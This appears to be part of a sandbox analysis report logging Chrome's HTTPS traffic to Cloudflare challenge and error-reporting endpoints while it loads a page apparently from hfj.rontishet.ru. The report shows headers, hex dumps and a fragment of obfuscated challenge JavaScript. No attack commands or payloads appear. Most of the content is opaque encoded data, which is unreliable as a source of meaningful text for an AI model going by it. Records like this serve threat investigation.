                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: M[gI(626)]=function(iN){if(iN=gI,eM[iN(782)])return;eM[iN(782)]=!![]},fZ=0,eN[gI(1226)]===gI(943)?eN[gI(403)](gI(1522),function(j1,c){j1=gI,c={'NOfRP':function(d,e,f){return d(e,f)}},c[j1(1398)](setTimeout,g2,0)}):setTimeout(g2,0),g3=function(f,j2,g,h,i,j


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    20192.168.2.449763104.18.95.414434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:28 UTC925OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/194391686:1727712828:JRtCI2iqmwXzQ6uA9YbttRQhBtGvVV2Rs_-r0xzpao4/8cb5e237ab880f47/1bf49d3282149e4 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 2733
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    CF-Challenge: 1bf49d3282149e4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/yzcnc/0x4AAAAAAAj4CaQsDLLGC_TE/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:28 UTC2733OUTData Raw: 76 5f 38 63 62 35 65 32 33 37 61 62 38 38 30 66 34 37 3d 6e 6f 56 53 68 53 43 53 6f 53 54 53 4b 61 66 7a 61 66 32 53 61 48 41 33 35 4d 61 70 66 35 66 36 77 48 65 37 74 66 31 6c 39 66 74 74 61 79 66 42 66 2d 48 70 33 69 74 66 75 66 6e 53 6c 6f 66 67 66 42 68 56 53 78 66 65 48 61 54 66 34 74 78 37 76 65 66 5a 38 66 65 35 66 61 71 46 36 66 66 48 30 4e 66 75 48 41 25 32 62 4f 34 31 37 74 31 74 30 66 70 38 5a 73 45 24 71 42 72 75 65 66 6e 56 6c 56 66 71 74 61 77 51 70 46 38 5a 4d 45 51 68 44 44 64 55 70 32 71 66 4f 32 37 65 66 61 31 72 53 41 61 41 66 53 46 65 66 66 36 31 66 41 67 4d 74 66 67 56 79 54 53 66 6c 6f 66 57 49 48 6f 54 50 42 49 4f 35 74 66 59 53 5a 2b 66 41 56 72 66 35 51 73 6c 74 41 49 66 5a 6f 71 66 65 43 6e 56 30 57 6b 37 49 4e 4e 6c 50 48 6b 73
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: v_8cb5e237ab880f47=noVShSCSoSTSKafzaf2SaHA35Mapf5f6wHe7tf1l9fttayfBf-Hp3itfufnSlofgfBhVSxfeHaTf4tx7vefZ8fe5faqF6ffH0NfuHA%2bO417t1t0fp8ZsE$qBruefnVlVfqtawQpF8ZMEQhDDdUp2qfO27efa1rSAaAfSFeff61fAgMtfgVyTSflofWIHoTPBIO5tfYSZ+fAVrf5QsltAIfZoqfeCnV0Wk7INNlPHks
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:28 UTC717INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:20:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 152136
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cf-chl-gen: VBDr+clHLIfZvQwvkTQmxFnmrbcD6oGrzpPK/7bRHQ/lch91ZG6fj3d4oD7JNvqSlJMc6TRAM+HzEVkSfVYlOHDD3t9U1OI5tS+nTjKbNaJIEDoq9e5+2S+KSXy8XUFJ3qfAHY6X1FSzil/OyXTo3lxE82pTqfAt4dEQ2UGlKZq4ZZPt+1zV6wXreHp+ThzCJTeCsIb2RXHkj0bxb/1t9ZmyOtDmghkIcHYYKKSwZYl3Qx4sPXNkAYDQ63FVDsntbme8i2H7C0wDHlBllsVLERZlDZl4WNN1zNnwT/PUC+mnLfGa7th3RyJsCroKPm1h3+N70NjjYxvG/BU7rrZ1Xml+CSTHa/koY+8Vjr3T/jUbgL2bQyjE75EXwuR6AOAEhHIGN62HdS6gQyRT6LPkKy70WMlHuA+aDDC0G6zBqCAE6BoeIlHvC29OSsWYr1rr7gUHWM6fVpjCv3KT/y797tenAVyqrbOZXrFYZ4qWcRGyxYs=$iDVm3iBuwVXMQh42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    CF-RAY: 8cb5e2422d1b4291-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:28 UTC652INData Raw: 6c 4c 6d 7a 77 4a 43 4e 6a 5a 6d 54 6f 62 65 45 69 49 61 6b 70 73 6a 49 6a 73 6d 4c 30 38 44 51 79 61 47 35 32 4c 44 63 6c 4e 79 78 30 4b 43 63 72 73 57 67 74 37 37 5a 70 63 6e 4b 79 4e 7a 6a 76 2b 6a 66 73 62 33 4b 33 38 6e 48 77 4e 48 72 32 2f 61 39 74 65 36 37 73 38 72 78 33 76 4c 6d 33 39 76 62 2b 66 30 45 31 2b 6b 42 43 4f 66 6f 42 50 58 6e 41 68 54 30 41 2f 63 47 45 68 4c 76 43 77 4c 78 32 53 55 66 46 51 66 6b 41 75 4d 69 35 78 7a 6e 4a 75 34 48 4d 42 37 78 49 69 66 74 45 2f 51 4b 4a 41 34 74 2b 44 63 53 48 50 77 37 46 55 59 50 2b 44 77 53 43 54 6b 4b 50 42 30 75 51 44 74 46 54 79 45 76 43 43 63 6b 4b 6b 74 52 52 6c 6b 70 53 42 68 63 4f 56 45 66 55 45 35 6a 49 57 52 66 51 6c 68 46 57 54 34 74 4c 55 6c 4d 4d 57 6f 78 65 48 42 73 55 54 5a 4f 58 54 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: lLmzwJCNjZmTobeEiIakpsjIjsmL08DQyaG52LDclNyx0KCcrsWgt77ZpcnKyNzjv+jfsb3K38nHwNHr2/a9te67s8rx3vLm39vb+f0E1+kBCOfoBPXnAhT0A/cGEhLvCwLx2SUfFQfkAuMi5xznJu4HMB7xIiftE/QKJA4t+DcSHPw7FUYP+DwSCTkKPB0uQDtFTyEvCCckKktRRlkpSBhcOVEfUE5jIWRfQlhFWT4tLUlMMWoxeHBsUTZOXTt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:28 UTC1369INData Raw: 6c 36 4b 42 5a 49 32 76 65 57 64 6b 68 49 43 4e 64 59 79 59 69 37 53 50 72 35 4b 30 76 4c 2b 34 77 72 57 30 76 34 44 45 6e 59 65 57 6f 38 6d 35 79 4c 44 47 76 73 47 4f 76 37 62 53 6b 61 4f 76 6b 5a 65 79 6d 4d 69 36 6e 70 66 58 74 4e 44 67 73 5a 6d 69 76 61 71 69 77 63 79 74 72 4e 48 61 75 39 4c 46 78 2b 33 4f 73 4f 61 34 7a 4d 72 6c 75 4e 7a 57 31 39 66 6a 30 76 37 46 33 74 53 2f 35 65 44 2b 32 74 2f 4d 43 51 76 6d 35 51 6f 50 39 41 33 59 43 50 6a 6e 39 51 34 58 30 51 4c 5a 45 41 2f 74 32 2f 76 6e 2b 66 48 6e 47 53 77 43 4a 65 37 73 34 78 34 68 4a 43 6b 6f 37 54 41 4e 47 79 67 57 50 52 58 31 49 6a 67 30 4d 41 35 43 49 50 6b 61 41 53 45 32 54 41 52 43 44 7a 30 6d 4c 54 39 55 55 79 35 47 46 43 49 6f 55 69 73 61 48 79 70 4a 55 6d 4e 6c 48 43 52 6f 57 53 49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: l6KBZI2veWdkhICNdYyYi7SPr5K0vL+4wrW0v4DEnYeWo8m5yLDGvsGOv7bSkaOvkZeymMi6npfXtNDgsZmivaqiwcytrNHau9LFx+3OsOa4zMrluNzW19fj0v7F3tS/5eD+2t/MCQvm5QoP9A3YCPjn9Q4X0QLZEA/t2/vn+fHnGSwCJe7s4x4hJCko7TANGygWPRX1Ijg0MA5CIPkaASE2TARCDz0mLT9UUy5GFCIoUisaHypJUmNlHCRoWSI
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:28 UTC1369INData Raw: 62 47 71 70 36 71 73 6e 36 75 34 74 61 2b 49 71 37 61 37 75 58 32 61 76 49 47 30 75 4c 62 49 75 63 71 34 70 4b 43 75 77 38 2b 49 6f 4d 57 72 6f 36 62 51 77 6f 2f 47 31 37 50 54 78 72 2f 63 75 37 43 2f 73 75 44 61 30 4c 37 59 35 63 6d 34 70 62 37 61 33 4f 6a 52 79 36 37 67 30 4d 2f 44 30 75 48 69 35 38 37 70 74 63 6a 75 30 38 48 44 30 37 76 66 35 67 62 59 43 4d 55 45 42 67 63 4a 35 41 37 36 43 51 67 53 41 52 58 71 41 68 4d 53 30 2b 59 4e 46 76 6a 74 2b 78 6e 37 38 51 44 33 39 2f 59 61 44 51 54 37 36 43 49 6f 34 78 45 63 2f 43 51 6c 45 6a 63 33 43 69 6f 39 2b 50 34 4c 4f 52 59 6a 4d 77 2f 33 51 78 4d 47 49 51 63 36 4a 79 30 6e 47 69 5a 51 54 45 4e 56 55 67 31 45 54 45 4d 36 4d 6c 4a 4e 46 53 67 65 4e 43 4a 6b 51 56 63 6e 57 45 64 6c 49 6c 68 63 58 45 38 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: bGqp6qsn6u4ta+Iq7a7uX2avIG0uLbIucq4pKCuw8+IoMWro6bQwo/G17PTxr/cu7C/suDa0L7Y5cm4pb7a3OjRy67g0M/D0uHi587ptcju08HD07vf5gbYCMUEBgcJ5A76CQgSARXqAhMS0+YNFvjt+xn78QD39/YaDQT76CIo4xEc/CQlEjc3Cio9+P4LORYjMw/3QxMGIQc6Jy0nGiZQTENVUg1ETEM6MlJNFSgeNCJkQVcnWEdlIlhcXE8t
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:28 UTC1369INData Raw: 5a 79 67 58 71 5a 70 37 32 72 69 72 75 50 6b 4c 6a 45 6f 70 43 2b 6e 61 44 4c 6d 38 53 2f 79 38 4f 68 6e 71 32 6e 30 71 71 78 73 39 61 74 32 38 32 5a 73 4e 36 61 6c 37 65 38 6e 74 62 50 31 72 2f 6d 76 4f 76 64 36 4d 44 76 35 65 54 48 7a 4b 37 79 79 4b 7a 49 72 38 4b 36 37 38 7a 49 74 62 62 4a 39 2b 4d 46 33 2b 4f 39 39 39 37 31 32 63 58 33 33 63 44 6b 35 41 33 45 38 74 2f 77 45 74 58 32 38 2f 48 57 39 75 33 31 46 67 4c 77 39 42 62 69 34 75 50 34 41 50 4c 35 48 65 6e 73 35 51 30 4d 45 77 66 2b 35 67 55 30 42 42 63 76 49 7a 6a 37 4f 44 6b 50 4d 44 6b 37 50 45 55 2b 47 78 73 53 52 53 6f 68 48 43 59 46 52 52 38 6a 4d 6b 49 69 45 53 70 41 51 6a 42 4b 56 30 68 57 46 6b 67 39 59 53 39 6a 4f 32 4a 6b 56 31 73 6b 4b 56 6b 37 62 57 73 2f 50 30 35 74 52 32 74 43 62
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ZygXqZp72riruPkLjEopC+naDLm8S/y8Ohnq2n0qqxs9at282ZsN6al7e8ntbP1r/mvOvd6MDv5eTHzK7yyKzIr8K678zItbbJ9+MF3+O999712cX33cDk5A3E8t/wEtX28/HW9u31FgLw9Bbi4uP4APL5Hens5Q0MEwf+5gU0BBcvIzj7ODkPMDk7PEU+GxsSRSohHCYFRR8jMkIiESpAQjBKV0hWFkg9YS9jO2JkV1skKVk7bWs/P05tR2tCb
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:28 UTC1369INData Raw: 58 71 49 32 77 66 62 75 4e 77 72 2b 44 77 38 4f 30 76 37 65 31 77 74 43 6d 6a 4a 2f 45 7a 5a 48 53 72 6f 2b 57 78 36 57 59 75 4c 6e 4e 31 73 4b 30 33 4c 61 65 78 38 53 66 73 2b 54 6e 31 72 6d 33 30 50 44 43 36 76 50 55 35 38 66 52 35 65 33 77 30 2b 54 30 39 67 44 37 39 64 62 79 30 51 4c 50 31 66 6e 6d 78 51 48 74 37 65 44 76 7a 52 44 69 36 65 30 48 30 68 6a 78 43 75 73 4b 35 64 59 62 36 52 30 4e 39 66 33 67 42 65 44 65 2f 42 6a 31 43 79 41 58 39 79 63 5a 43 79 49 45 42 52 48 76 4c 77 48 72 45 51 38 64 4e 42 6f 35 47 54 59 43 46 6a 34 38 47 45 46 48 49 53 6f 2f 48 42 6b 4e 51 30 52 4f 50 53 56 4c 51 7a 49 57 54 53 4a 48 55 6b 38 76 53 30 42 59 4e 44 34 33 59 53 52 50 4a 47 4e 42 52 54 78 6d 52 45 42 75 53 30 5a 30 61 6a 56 4f 55 6a 4d 35 54 6b 55 75 62 30
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: XqI2wfbuNwr+Dw8O0v7e1wtCmjJ/EzZHSro+Wx6WYuLnN1sK03Laex8Sfs+Tn1rm30PDC6vPU58fR5e3w0+T09gD79dby0QLP1fnmxQHt7eDvzRDi6e0H0hjxCusK5dYb6R0N9f3gBeDe/Bj1CyAX9ycZCyIEBRHvLwHrEQ8dNBo5GTYCFj48GEFHISo/HBkNQ0ROPSVLQzIWTSJHUk8vS0BYND43YSRPJGNBRTxmREBuS0Z0ajVOUjM5TkUub0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:28 UTC1369INData Raw: 68 4d 43 37 78 62 61 58 6d 71 75 38 77 61 47 71 30 63 61 62 71 4d 69 77 79 71 65 30 78 39 47 58 72 74 6d 52 75 35 66 62 32 74 71 2f 77 4a 33 63 6f 4d 66 56 32 75 6e 5a 6f 63 2f 4a 33 4e 2f 4f 78 39 4b 32 34 74 48 54 2b 66 6e 50 32 72 37 73 75 76 66 38 7a 72 66 51 34 63 67 41 36 74 54 44 78 41 66 5a 35 74 48 4c 44 75 49 58 30 2b 44 68 47 64 58 57 46 50 67 64 45 43 41 4e 34 4f 49 47 32 79 67 67 47 4f 55 73 42 41 34 6c 41 42 77 67 37 54 51 63 2f 68 59 6d 4c 7a 63 33 45 44 63 4b 48 42 6a 34 4d 69 77 31 49 54 34 39 44 77 49 6b 50 6b 77 71 4e 67 5a 4d 43 68 78 47 4a 6a 4d 6c 51 42 45 51 4a 43 68 57 47 51 39 4a 55 56 35 50 51 6c 52 5a 59 69 5a 66 52 53 6c 53 5a 7a 70 57 59 32 6b 70 53 31 46 71 58 44 52 58 61 6e 56 75 62 6c 52 61 5a 6d 34 36 66 30 31 33 58 58 4b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: hMC7xbaXmqu8waGq0cabqMiwyqe0x9GXrtmRu5fb2tq/wJ3coMfV2unZoc/J3N/Ox9K24tHT+fnP2r7suvf8zrfQ4cgA6tTDxAfZ5tHLDuIX0+DhGdXWFPgdECAN4OIG2yggGOUsBA4lABwg7TQc/hYmLzc3EDcKHBj4Miw1IT49DwIkPkwqNgZMChxGJjMlQBEQJChWGQ9JUV5PQlRZYiZfRSlSZzpWY2kpS1FqXDRXanVublRaZm46f013XXK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:28 UTC1369INData Raw: 61 50 4a 72 4b 66 4f 77 36 62 44 6e 73 37 50 78 36 2b 53 78 4e 7a 46 79 35 75 6f 76 36 36 37 76 64 58 4e 74 4e 65 65 31 61 54 70 76 38 6a 4c 75 62 2f 78 78 73 7a 50 77 61 79 32 35 65 75 33 78 65 76 7a 39 51 43 37 30 4d 38 46 76 76 6e 68 77 4d 44 37 36 67 54 72 2f 41 62 64 44 51 2f 51 43 68 49 42 42 42 50 6e 2b 4e 48 77 36 50 77 61 45 2f 45 58 32 39 73 6a 38 66 55 6d 35 64 38 66 36 2b 63 4d 34 50 34 61 36 79 67 68 49 6a 41 48 4c 44 67 74 38 75 33 79 4e 2f 66 35 48 68 49 5a 46 78 38 59 53 42 51 59 49 51 4d 56 4a 77 67 6e 51 45 39 4d 4b 54 46 55 4d 43 55 72 4b 78 6f 62 4d 79 35 66 4b 7a 31 64 51 31 73 6a 51 31 67 34 5a 57 70 45 4a 54 56 43 52 30 56 4b 54 6b 46 6a 59 31 46 50 5a 33 64 4d 56 48 42 32 5a 31 31 4f 57 33 35 77 59 32 31 53 57 32 46 39 56 33 5a 47
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: aPJrKfOw6bDns7Px6+SxNzFy5uov667vdXNtNee1aTpv8jLub/xxszPway25eu3xevz9QC70M8FvvnhwMD76gTr/AbdDQ/QChIBBBPn+NHw6PwaE/EX29sj8fUm5d8f6+cM4P4a6yghIjAHLDgt8u3yN/f5HhIZFx8YSBQYIQMVJwgnQE9MKTFUMCUrKxobMy5fKz1dQ1sjQ1g4ZWpEJTVCR0VKTkFjY1FPZ3dMVHB2Z11OW35wY21SW2F9V3ZG
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:28 UTC1369INData Raw: 6e 41 79 35 54 54 74 74 62 4d 73 70 76 56 74 4c 66 4f 31 36 44 57 79 37 2f 42 32 72 53 2b 32 36 58 69 32 63 32 2b 70 39 76 6a 77 71 58 48 31 64 54 42 79 75 6e 78 7a 4f 62 75 39 50 76 62 38 2b 49 41 33 50 58 42 42 4f 48 36 32 67 54 6b 2f 51 58 49 35 77 50 6a 36 41 49 49 35 4f 48 78 43 67 2f 6f 43 76 7a 58 36 42 41 42 38 74 73 53 46 2b 4c 34 46 68 73 4c 36 78 63 66 44 79 63 66 45 68 44 77 44 79 63 58 4e 79 55 72 4d 66 73 72 4c 78 30 4e 4c 44 50 39 2f 42 67 6c 47 42 45 7a 4f 30 45 4d 4f 44 35 43 44 53 68 44 4d 46 51 75 4e 54 64 55 4d 7a 6b 37 46 54 42 4f 56 69 6c 4c 55 6c 6c 6b 4f 45 56 45 61 45 46 63 62 47 77 2f 53 44 78 69 62 6c 41 72 54 55 64 6d 61 6e 52 4f 56 6d 78 49 66 46 68 34 53 48 73 35 54 56 4a 68 55 6d 5a 36 64 58 31 30 58 6e 2b 46 68 32 71 4d 69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: nAy5TTttbMspvVtLfO16DWy7/B2rS+26Xi2c2+p9vjwqXH1dTByunxzObu9Pvb8+IA3PXBBOH62gTk/QXI5wPj6AII5OHxCg/oCvzX6BAB8tsSF+L4FhsL6xcfDycfEhDwDycXNyUrMfsrLx0NLDP9/BglGBEzO0EMOD5CDShDMFQuNTdUMzk7FTBOVilLUllkOEVEaEFcbGw/SDxiblArTUdmanROVmxIfFh4SHs5TVJhUmZ6dX10Xn+Fh2qMi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:28 UTC1369INData Raw: 6b 6f 73 76 62 31 72 53 33 31 4e 58 44 74 4f 50 59 34 4b 66 5a 35 4b 4c 6d 70 64 61 2b 72 4e 32 2f 76 4f 48 30 78 75 61 7a 36 4e 66 56 79 37 66 4f 2f 66 58 65 2b 41 50 37 2f 65 48 61 38 73 6a 33 41 4f 77 43 41 75 2f 4f 43 4f 50 77 43 76 48 53 42 42 4d 4c 30 68 44 7a 45 78 34 61 2b 66 45 67 46 78 59 65 35 64 34 6d 41 41 59 4b 35 79 41 57 4a 42 37 37 36 53 72 7a 4c 67 4d 50 4b 77 34 47 38 77 33 30 39 76 6f 59 41 51 72 35 50 7a 68 47 41 69 68 45 48 76 77 37 47 6b 49 68 4a 6b 78 4d 44 45 70 52 50 30 39 41 47 45 51 6e 50 52 56 57 48 56 5a 67 46 45 38 68 55 43 41 5a 4f 69 56 56 59 45 78 67 4b 31 74 6e 59 45 46 79 4d 45 70 42 5a 6b 6c 77 63 6d 4e 64 57 6b 35 75 64 6c 70 62 58 30 4a 46 57 31 4e 61 61 6b 52 4c 62 46 70 70 67 59 6c 61 66 6e 4a 52 6b 49 74 52 61 57
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: kosvb1rS31NXDtOPY4KfZ5KLmpda+rN2/vOH0xuaz6NfVy7fO/fXe+AP7/eHa8sj3AOwCAu/OCOPwCvHSBBML0hDzEx4a+fEgFxYe5d4mAAYK5yAWJB776SrzLgMPKw4G8w309voYAQr5PzhGAihEHvw7GkIhJkxMDEpRP09AGEQnPRVWHVZgFE8hUCAZOiVVYExgK1tnYEFyMEpBZklwcmNdWk5udlpbX0JFW1NaakRLbFppgYlafnJRkItRaW


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    21192.168.2.44976435.190.80.14434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:28 UTC533OUTOPTIONS /report/v4?s=gyxYidiwrhwpJpPU6KB7GxxPwjhNOBH%2BaxWvYcHGoNOA%2FitPGk7RSFdoY0ynWhM4B51lfDJIo0JoS33kPQooXu52G4v82gwKgixTK8j3RjDDChJFd0cGRza3hwalCA%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Origin: https://hfj.rontishet.ru
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Request-Method: POST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:28 UTC336INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    access-control-max-age: 86400
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    access-control-allow-methods: OPTIONS, POST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    access-control-allow-headers: content-type, content-length
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    date: Mon, 30 Sep 2024 17:20:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    22192.168.2.449765104.18.95.414434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:28 UTC438OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:28 UTC210INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:20:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: image/png
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cache-control: max-age=2629800, public
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    CF-RAY: 8cb5e242fff14350-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:28 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    23192.168.2.44976635.190.80.14434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:29 UTC474OUTPOST /report/v4?s=gyxYidiwrhwpJpPU6KB7GxxPwjhNOBH%2BaxWvYcHGoNOA%2FitPGk7RSFdoY0ynWhM4B51lfDJIo0JoS33kPQooXu52G4v82gwKgixTK8j3RjDDChJFd0cGRza3hwalCA%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 432
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/reports+json
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
